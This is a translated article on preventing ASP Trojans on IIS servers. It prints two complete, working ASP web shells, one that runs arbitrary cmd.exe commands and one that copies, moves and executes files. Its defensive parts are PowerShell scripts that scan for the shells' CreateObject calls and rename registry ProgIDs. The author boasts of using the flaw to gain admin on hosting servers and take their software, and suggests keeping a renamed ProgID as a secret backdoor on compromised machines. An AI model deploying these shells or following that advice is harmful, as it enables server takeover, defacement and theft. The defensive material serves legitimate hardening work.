Prevent ASP Trojans

Source: Internet
Author: User

With the development of ASP technology, more and more websites on the network are built on ASP, and support for ASP is already a basic function of the IIS server in Windows. However, Trojans and backdoors based on ASP are also becoming more numerous and more powerful. Because ASP is a scripting service provided by the server itself, such ASP script Trojans and backdoors are not detected or removed by anti-virus software; hackers call them "the backdoor that will never be caught". Their high concealment and the difficulty of detecting and removing them pose a serious threat to website security, so the prevention and removal of ASP Trojans places higher technical demands on us as network administrators.

Next, based on my personal experience, I will discuss the prevention methods for two typical ASP Trojans, hoping it helps you.
The code of the first Trojan is as follows:
<title>ASP Shell</title>
<%@ Language=VBScript %>
<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' -- Create the COM objects that we will be using --
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' -- Check for a command that we have posted --
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
    ' -- Use a poor man's pipe ... a temp file --
    szTempFile = "C:\" & oFileSys.GetTempName()
    Call oScript.Run("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
    Set oFile = oFileSys.OpenTextFile(szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Execute Command">
</FORM>
<PRE>
<%
If (IsObject(oFile)) Then
    ' -- Read the output from our command and remove the temp file --
    On Error Resume Next
    Response.Write Server.HTMLEncode(oFile.ReadAll)
    oFile.Close
    Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</PRE>
</BODY>
</HTML>
After running:

Enter the DIR command in the command box and execute it to view the directory. It can run all kinds of DOS commands, such as copy, net and netstat.


However, its default execution permission is only that of the Guest group, that is, the permission of the IUSR_COMPUTER account. Of course, if the IUSR_COMPUTER account has been added to the Administrators group, the shell runs with administrator privileges.

This Trojan is convenient to use; it is almost the same as a DOS command-line window. However, if the server restricts FSO (does not allow the component), it cannot be used. In addition, it cannot be used on virtual hosts added to the server later; it only works on the "Default Web Site", so its scope of application is narrow.
For the prevention method, look at its code:
Set oScript = Server.CreateObject("WSCRIPT.SHELL")   ' creates a WSCRIPT.SHELL object named oScript, used to execute commands
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
The preceding three lines create three objects: WSCRIPT.SHELL, WSCRIPT.NETWORK and Scripting.FileSystemObject. You only need to rename or delete the registry items that control the WSCRIPT.SHELL object. For example:

It is worth noting that both the "WSCRIPT.SHELL" item and the "WSCRIPT.SHELL.1" item must be renamed or deleted. If we only modify the "WSCRIPT.SHELL" item, the hacker only needs to change the code to Set oScript = Server.CreateObject("WSCRIPT.SHELL.1"), and the backdoor Trojan runs again.
You may also have realised that the new names for WSCRIPT.SHELL and WSCRIPT.SHELL.1 must not be easy for hackers to guess. For example, if you merely change WSCRIPT.SHELL to WSCRIPT.SHELL888, the hacker only needs to change the code to Set oScript = Server.CreateObject("WSCRIPT.SHELL888"), and the Trojan runs again. In addition, after the registry is modified, the web service must be restarted for the setting to take effect.
Next, look at the code of the second ASP backdoor Trojan:
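Because a renamed ProgID can still be guessed, as the paragraph above shows, a defender also wants to check the site content itself for uploaded scripts that instantiate these objects. The following PowerShell script is an added example, not code from the original article: it scans a directory for ASP files that call CreateObject on any of the ProgIDs the article names, matches versioned (".1") or renamed variants by prefix, and exercises itself against three constructed sample files in a temporary directory so it can be run without touching a real site. The Find-SuspiciousAsp function name, the sample files and the placeholder web-root path are assumptions of this example.

```powershell
# Added example, not part of the original article.
# Scans ASP content for CreateObject() calls that name the COM ProgIDs used by the
# two backdoors the article shows; the function name is this example's own choice.
function Find-SuspiciousAsp {
    param([Parameter(Mandatory)][string]$Path)

    # ProgIDs named in the article. The trailing [^"']* deliberately also matches
    # "WScript.Shell.1" or a renamed "WScript.Shell888", which the article warns about.
    $pattern = 'CreateObject\s*\(\s*["''](WScript\.Shell|WScript\.Network|Shell\.Application)[^"'']*["'']'

    # Select-String is case-insensitive by default, so createobject("shell.application") is caught too.
    Get-ChildItem -Path $Path -Recurse -File -Include *.asp,*.asa,*.inc |
        Select-String -Pattern $pattern |
        ForEach-Object {
            [pscustomobject]@{
                File     = $_.Path
                Line     = $_.LineNumber
                Match    = $_.Matches[0].Value
                # Last write time helps triage: a freshly uploaded script stands out.
                Modified = (Get-Item -LiteralPath $_.Path).LastWriteTime
            }
        }
}

# Constructed sample files (not real site content) so the scan can be exercised offline.
# index.asp contains no CreateObject call; the other two reference the article's ProgIDs.
$demo = Join-Path ([IO.Path]::GetTempPath()) 'asp-scan-demo'
New-Item -ItemType Directory -Path $demo -Force | Out-Null
Set-Content -Path (Join-Path $demo 'index.asp')  -Value '<% Response.Write Now() %>'
Set-Content -Path (Join-Path $demo 'upload.asp') -Value '<% Set o = Server.CreateObject("WScript.Shell.1") %>'
Set-Content -Path (Join-Path $demo 'tool.asp')   -Value '<% set s = server.createobject("shell.application") %>'

Find-SuspiciousAsp -Path $demo | Format-Table -AutoSize

# For a real host, run it against the content root of every virtual host, e.g.:
# Find-SuspiciousAsp -Path 'C:\inetpub\wwwroot'   # placeholder path, adjust per site
```

The scan is a content check, not a substitute for the registry change: a hit tells you a script on the host tries to obtain one of these objects, which on a site that has no business running shell commands is reason enough to pull the file and review how it was uploaded. Run it on every virtual host's directory, since the article notes the second backdoor works from any virtual space on the server.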
<% Response.Write "<font size=6 color=red>Only one operation can be executed at a time.</font>" %>
<% Response.Write Now() %><BR>Physical path of the program:
<% Response.Write Request.ServerVariables("APPL_PHYSICAL_PATH") %>
<html>
<title>asp shell.application backdoor</title>
<body>
<form action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=text value="<%= szCMD %>"> Enter the directory to be viewed<br>
<input type=text name=text1 value="<%= szCMD1 %>">
Copy
<input type=text name=text2 value="<%= szCMD2 %>"><br>
<input type=text name=text3 value="<%= szCMD3 %>">
Move
<input type=text name=text4 value="<%= szCMD4 %>"><br>
Path: <input type=text name=text5 value="<%= szCMD5 %>">
Program: <input type=text name=text6 value="<%= szCMD6 %>"><br>
<input type=submit name=sb value="Send command">
</form>
</body>
</html>
<%
szCMD = Request.Form("text")   ' directory browsing
If (szCMD <> "") Then
    Set shell = Server.CreateObject("shell.application")   ' create a shell object
    Set fod1 = shell.NameSpace(szCMD)
    Set foditems = fod1.Items
    For Each co In foditems
        Response.Write "<font color=red>" & co.Path & "-----" & co.Size & "</font><br>"
    Next
End If
%>

<%
szCMD1 = Request.Form("text1")   ' directory copy; file copy is not possible
szCMD2 = Request.Form("text2")
If szCMD1 <> "" And szCMD2 <> "" Then
    Set shell1 = Server.CreateObject("shell.application")   ' create a shell object
    Set fod1 = shell1.NameSpace(szCMD2)
    ' split szCMD1 at its last backslash into parent path and item name
    For i = Len(szCMD1) To 1 Step -1
        If Mid(szCMD1, i, 1) = "\" Then
            path = Left(szCMD1, i - 1)
            Exit For
        End If
    Next
    If Len(path) = 2 Then path = path & "\"   ' bare drive letter such as C:
    path2 = Right(szCMD1, Len(szCMD1) - i)
    Set fod2 = shell1.NameSpace(path)
    Set foditem = fod2.ParseName(path2)
    fod1.CopyHere foditem
    Response.Write "command completed success!"
End If
%>

<%
szCMD3 = Request.Form("text3")   ' directory move
szCMD4 = Request.Form("text4")
If szCMD3 <> "" And szCMD4 <> "" Then
    Set shell2 = Server.CreateObject("shell.application")   ' create a shell object
    Set fod1 = shell2.NameSpace(szCMD4)

    ' split szCMD3 at its last backslash into parent path and item name
    For i = Len(szCMD3) To 1 Step -1
        If Mid(szCMD3, i, 1) = "\" Then
            path = Left(szCMD3, i - 1)
            Exit For
        End If
    Next

    If Len(path) = 2 Then path = path & "\"   ' bare drive letter such as C:
    path2 = Right(szCMD3, Len(szCMD3) - i)
    Set fod2 = shell2.NameSpace(path)
    Set foditem = fod2.ParseName(path2)
    fod1.MoveHere foditem
    Response.Write "command completed success!"
End If
%>
<%
szCMD5 = Request.Form("text5")   ' path of the program to execute
szCMD6 = Request.Form("text6")   ' program name
If szCMD5 <> "" And szCMD6 <> "" Then
    Set shell3 = Server.CreateObject("shell.application")   ' create a shell object
    shell3.NameSpace(szCMD5).Items.Item(szCMD6).InvokeVerb
    Response.Write "command completed success!"
End If
%>
After execution, for example:

To view a directory, simply enter the directory and click "Send command". For example:

This Trojan can copy, move and execute programs. However, many commands are unavailable, such as del, net and netstat. Simple as it is, it is enough to hack a website: for example, the home page of the website can be moved elsewhere and a hacker page with the same name copied in.
The most worrying thing is that this Trojan works on any virtual host. That is to say, as long as I am a user of one virtual space on the server, I can upload this Trojan and use it to modify the homepage of any other user. So if the provider of the virtual space has not applied the fix, it is really in trouble.
However, in my practice, many virtual hosting providers in China, especially some small ones, have not been patched. I used this vulnerability to get ADMIN on many virtual hosting servers and helped them fix the vulnerability. Of course, I also got what I wanted: a lot of good software and code. Many of the ASP programs I use today were taken from them, which is hard to say out loud. It should be said that they were DOWN.
To put it bluntly, how should we prevent this ASP backdoor Trojan? Look at this line of its code: Set shell = Server.CreateObject("shell.application"). The method is the same as before, for example:


You only need to rename or delete the "shell.application" and "shell.application.1" items. Remember, if you rename them, make the new name complex enough that hackers cannot simply guess it. By the way, it is recommended that you change the name on a zombie and write down the name; in this way it becomes a secret backdoor.
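To carry out the registry change described in this paragraph and in the earlier WSCRIPT.SHELL paragraph in a repeatable way, here is an added PowerShell example (not code from the original article). It audits every ProgID the two backdoors use, including the ".1" versioned aliases the article says must also be handled, reports whether Server.CreateObject would still succeed for each, and only when run with -Rename renames the keys under HKEY_CLASSES_ROOT to a suffix you supply and restarts IIS, as the article requires. The parameter names, the placeholder suffix and the decision to audit but not rename Scripting.FileSystemObject are this example's own; run it elevated on the IIS host.

```powershell
# Added example, not part of the original article. Run elevated on the IIS host.
# Audits (and, with -Rename, renames) the COM ProgIDs the two ASP backdoors rely on.
param(
    [switch]$Rename,
    [string]$Suffix = 'PLACEHOLDER_CHOOSE_A_LONG_RANDOM_SUFFIX'   # placeholder: pick your own
)

# Every ProgID the article mentions, with the ".1" aliases it says must also be handled.
$auditIds = @(
    'WScript.Shell', 'WScript.Shell.1',
    'WScript.Network', 'WScript.Network.1',
    'Shell.Application', 'Shell.Application.1',
    'Scripting.FileSystemObject'
)
# Scripting.FileSystemObject is audited but not renamed here: many legitimate ASP
# applications depend on it, so treat any change to it as a separate decision.
$renameIds = $auditIds | Where-Object { $_ -ne 'Scripting.FileSystemObject' }

foreach ($id in $auditIds) {
    $key = "Registry::HKEY_CLASSES_ROOT\$id"
    $present = Test-Path -LiteralPath $key

    # Server.CreateObject resolves the ProgID to a CLSID; this is the same lookup,
    # so True here means the backdoor's CreateObject call would still work.
    $resolves = $false
    try {
        [void][System.Type]::GetTypeFromProgID($id, $true)
        $resolves = $true
    } catch { }

    '{0,-28} key present: {1,-5} CreateObject works: {2}' -f $id, $present, $resolves

    if ($Rename -and $present -and ($renameIds -contains $id)) {
        Rename-Item -LiteralPath $key -NewName ($id + $Suffix)
        "    renamed to $id$Suffix"
    }
}

if ($Rename) {
    # The article notes the web service must be restarted before the change takes effect.
    iisreset
}
```

Run it once without -Rename to record the current state, and again afterwards to confirm the "CreateObject works" column has turned to False for every renamed ProgID. Before renaming, inventory any legitimate scripts on the host that use WScript.Shell or Shell.Application, because they will break in exactly the same way the backdoor does. The rename is obscurity, as the article's own WSCRIPT.SHELL888 example shows, so keep it paired with scanning uploaded content and with keeping the IUSR_COMPUTER account out of the Administrators group, which the article also mentions.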

Finally, a summary of the two ASP Trojan backdoors and how to prevent them: the first Trojan is more powerful, but has a narrow scope of application and requires FSO support, that is, Scripting.FileSystemObject.
